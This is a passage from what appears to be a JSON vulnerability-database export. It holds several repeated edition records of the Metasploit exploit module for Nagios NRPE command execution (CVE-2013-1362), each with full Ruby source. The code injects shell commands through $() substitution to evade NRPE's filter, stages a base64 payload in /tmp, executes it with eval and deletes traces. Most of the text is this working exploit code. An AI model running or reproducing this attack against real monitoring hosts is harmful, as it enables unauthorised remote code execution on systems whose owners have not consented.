Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n 
end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless 
datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-04-21T22:33:47", "differentElements": ["modified", "published"], "edition": 69}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. 
When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-04-27T16:43:13", "history": [], "viewCount": 96, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. 
When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n 
end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless 
datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-04-27T16:43:13", "differentElements": ["modified", "published"], "edition": 70}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. 
When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-04-27T18:45:23", "history": [], "viewCount": 101, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. 
When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n 
end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless 
datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-04-27T18:45:23", "differentElements": ["modified", "published"], "edition": 71}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. 
When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-05-31T03:42:59", "history": [], "viewCount": 101, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. 
When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n 
end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless 
datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-05-31T03:42:59", "differentElements": ["modified", "published"], "edition": 72}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. 
When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-05-31T05:45:50", "history": [], "viewCount": 101, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. 
When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n 
end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless 
